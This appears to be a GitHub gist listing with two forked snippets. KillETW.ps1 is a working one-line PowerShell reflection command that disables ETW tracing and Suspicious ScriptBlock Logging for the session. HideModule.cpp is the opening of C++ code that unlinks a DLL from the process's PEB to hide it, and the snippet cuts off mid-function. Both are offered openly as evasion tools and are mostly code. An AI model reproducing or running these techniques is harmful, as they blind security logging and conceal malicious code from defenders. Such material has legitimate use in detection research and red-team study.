ndur0
/ KillETW.ps1
Created
July 14, 2020 14:35
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
ndur0
/ HideModule.cpp
Created
July 14, 2020 14:08
— forked from Fonger/HideModule.cpp
Hide DLL ( 32bit and 64bit support)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include "HideModule.h" | |
| std::vector<UNLINKED_MODULE> UnlinkedModules; | |
| void RelinkModuleToPEB(HMODULE hModule) | |
| { | |
| std::vector<UNLINKED_MODULE>::iterator it = std::find_if(UnlinkedModules.begin(), UnlinkedModules.end(), FindModuleHandle(hModule)); | |
| if (it == UnlinkedModules.end()) |